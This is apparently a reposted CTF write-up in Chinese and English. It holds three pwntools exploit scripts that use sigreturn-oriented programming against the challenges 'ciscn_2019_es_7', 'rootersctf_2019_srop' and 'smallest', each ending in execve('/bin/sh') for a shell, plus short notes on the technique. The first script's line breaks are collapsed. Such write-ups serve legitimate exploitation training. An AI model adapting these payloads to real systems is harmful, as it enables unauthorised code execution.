from pwn import *#p = process('./ciscn_2019_es_7')p = remote('node3.buuoj.cn',28142)elf = ELF('./ciscn_2019_es_7')context.log_level = 'debug'context.arch = 'amd64'pop_rdi = 0x4005a3vuln = 0x00000000004004ed#这里没有加上ebp,原因如下图payload = b'/bin/sh\x00'*2 + p64(vuln) p.sendline(payload)stack_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))p.recv()log.success('stack==>'+str(hex(stack_addr)))binsh_addr = stack_addr - 0x118sigret = 0x4004dasyscall = 0x400501frame = SigreturnFrame()frame.rdi = binsh_addrframe.rsi = 0frame.rdx = 0#frame.rsp = stack_addrframe.rax = constants.SYS_execveframe.rip = syscallpayload = '/bin/sh\x00'*2 + p64(sigret) + p64(syscall) + str(frame)#gdb.attach(p)p.sendline(payload)p.interactive()
1. 通过read函数溢出,pop_rax_syscall_ret 使之执行 frame中的指令(这里的地址可以选择text段)
2. 在frame中设计好 返回后的ebp,esp。需要注意的:
   - ==在执行sigreturn时,需要pop rsi(一个参数siginfo),因此,在sigreturn之前需要准备0x8的数据==
3. 返回后,再来一次sigreturn,这次知道了/bin/sh的地址,可以直接执行execve('/bin/sh',0,0)
# Writeup script (pwntools) for rootersctf_2019_srop.
# Frame 1 describes read(0, text, 0x300) with rsp/rbp moved to `text`;
# frame 2 describes execve(text, 0, 0). Both are entered through the same
# pop rax / syscall / ret gadget with rax = 0xf (rt_sigreturn on x86-64).
# NOTE(review): str and bytes are concatenated and str(frame) is used —
# Python 2 pwntools conventions, presumably the author's environment.
from pwn import *
p = process('./rootersctf_2019_srop')
#p = remote('node3.buuoj.cn',27344)
context.log_level = 'debug'
context.arch = 'amd64'
text = 0x402000
pop_rax_syscall_ret = 0x401032
syscall_ret = 0x401033
frame = SigreturnFrame()
frame.rax = constants.SYS_read
frame.rdi = 0
frame.rsi = text
frame.rdx = 0x300
frame.rsp = text
frame.rbp = text
frame.rip = syscall_ret
payload1 = 'b'*136 + p64(pop_rax_syscall_ret) + p64(0xf) + str(frame)
# Debugger attach and pauses were left in by the author.
gdb.attach(p)
pause()
p.send(payload1)
frame = SigreturnFrame()
frame.rax = constants.SYS_execve
frame.rdi = text
frame.rsi = 0
frame.rdx = 0
frame.rip = syscall_ret
pause()
payload2 = '/bin/sh'.ljust(8,'\x00') + p64(pop_rax_syscall_ret) +p64(0xf) + str(frame)
p.send(payload2)
p.interactive()
# Writeup script (pwntools) for the BUUOJ challenge "smallest".
# Sequence as written: three sends to obtain a leak, then a read frame,
# a sigreturn trigger, an execve frame, and a second sigreturn trigger.
# NOTE(review): str and bytes are concatenated and str(frame) is used —
# Python 2 pwntools conventions, presumably the author's environment.
from pwn import *
p = remote('node3.buuoj.cn',28274)
context.log_level = 'debug'
#p = process('./smallest')
# NOTE(review): `elf` is bound to a second, local process here (not an ELF
# object) and is never referenced below.
elf = process('./smallest')
context.arch = 'amd64'
syscall = 0x4000be
read = 0x4000b0
payload = p64(read)*3
p.send(payload)
# The first read rewrites the last byte of the second read's address, skipping
# the zeroing of rax so that write(1, rsp, 0x400) runs directly.
p.send('\xb3')
# Bytes 8..16 of the response are taken as the leaked value.
leak = u64(p.recv()[0x8:0x10])
log.success('leak==>'+str(hex(leak)))
frame = SigreturnFrame()
frame.rax = constants.SYS_read
frame.rdi = 0
frame.rsi = leak
frame.rdx = 0x400
frame.rsp = leak
frame.rip = syscall
# The third read first places the frame on the stack.
payload2 = p64(read)+ p64(0xdeadbeef)+str(frame)
#gdb.attach(p)
p.send(payload2)
# Perform the sigreturn call; since the frame is already on the stack, the
# register state described in the frame takes effect directly.
sigreturn = p64(syscall) + 'b'*7
p.send(sigreturn)
frame = SigreturnFrame()
frame.rax = constants.SYS_execve
frame.rdi = leak + 0x120
frame.rsi = 0
frame.rdx = 0
frame.rsp = leak
frame.rip = syscall
# Use the read set up by the previous frame to place payload3 at the leaked
# address; the /bin/sh string sits at offset 0x120, matching frame.rdi above.
payload3 = p64(read) + 'a'*8 + str(frame)
payload3 = payload3.ljust(0x120,'\x00') + '/bin/sh\x00'
#gdb.attach(p)
p.send(payload3)
# Perform the sigreturn call.
p.send(sigreturn)
p.interactive()
转载地址:http://ctugf.baihongyu.com/